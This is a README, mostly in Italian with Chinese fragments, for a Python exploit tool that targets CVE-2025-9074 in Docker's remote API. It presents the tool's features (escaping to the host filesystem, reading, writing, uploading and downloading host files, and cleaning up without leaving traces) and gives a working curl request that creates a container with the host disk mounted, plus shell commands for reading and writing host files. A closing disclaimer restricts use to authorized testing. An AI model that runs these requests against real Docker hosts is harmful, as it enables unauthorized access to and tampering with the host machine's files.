
Un potente strumento di exploit per l'API remota di Docker, utilizzato per la ricerca e il test di sicurezza della vulnerabilità CVE-2025-9074.
Un potente strumento di exploit per l'API remota di Docker, utilizzato per la ricerca e il test di sicurezza della vulnerabilità CVE-2025-9074.
✅ Gestione del ciclo di vita del container completamente automatica: crea automaticamente container temporanei, li pulisce automaticamente dopo le operazioni, senza lasciare tracce
✅ Gestione intelligente dei percorsi: riconosce e converte automaticamente i percorsi Windows nel formato di mount Docker
✅ Flusso di lavoro completamente automatizzato: non è necessario inserire manualmente comandi complessi, interazione a menu, operazioni sui file con un solo clic
✅ Compatibilità multipiattaforma: supporto perfetto per sistemi Windows e Linux
Operazioni sui container
Gestione immagini
Operazioni sui file dell'host
CVE-2025-9074 è una vulnerabilità di sicurezza nell'API remota di Docker. Un attaccante può, tramite accesso non autorizzato all'API Docker:
Installa tutte le dipendenze usando requirements.txt:
pip install -r requirements.txt
Oppure installa manualmente:
pip install requests docker websocket-client
Esegui direttamente lo script usando l'indirizzo API Docker predefinito:
python CVE-2025-9074-docker-exploit.py
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375
python CVE-2025-9074-docker-exploit.py [选项]
选项:
-u, --url URL Docker API 地址(默认: http://192.168.65.7:2375)
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名):
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!
Questo strumento gestisce automaticamente il mapping dei percorsi di Windows Docker Desktop:
| Percorso Windows |
|---|
Formati di input supportati:
D:\ o D:/D:\temp o D:/temp"D:\file.txt" (con virgolette)'D:/file.txt' (con virgolette)⚠️ Importante:
Creazione di un container tramite API Docker e montaggio del disco dell'host:
curl -X POST "http://<target>:2375/containers/create" \
-H "Content-Type: application/json" \
-d '{
"Image": "python:3.11.7",
"Cmd": ["sleep", "999d"],
"HostConfig": {
"Binds": ["/mnt/host/d:/tmp"]
},
"Tty": true
}'
Legge e scrive file dell'host eseguendo comandi nel container:
# 写入文件
echo "content" > /tmp/file.txt
# 读取文件
cat /tmp/file.txt
pip install docker websocket-clientpython CVE-2025-9074-docker-exploit.py
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│ ├── get_containers()
│ ├── display_containers()
│ ├── create_container()
│ ├── stop_container()
│ └── delete_container()
├── 镜像管理函数
│ ├── get_images()
│ ├── display_images()
│ ├── pull_image()
│ └── remove_image()
├── 宿主机文件操作函数
│ ├── upload_file_to_host()
│ ├── download_file_from_host()
│ ├── read_file_from_host()
│ └── write_file_to_host()
└── 工具函数
├── normalize_host_path()
├── create_container_with_mount()
├── start_container()
└── stop_and_remove_container()
Benvenuti contributi tramite Issue e Pull Request!
Questo progetto è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza.
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. L'utente si assume ogni responsabilità e rischio derivante dall'uso di questo strumento. L'autore non è responsabile per qualsiasi uso improprio o non autorizzato dello strumento.
| Percorso mount Docker |
|---|
D:\ | /mnt/host/d |
D:\temp | /mnt/host/d/temp |
C:\Windows | /mnt/host/c/Windows |
C:\Users\test | /mnt/host/c/Users/test |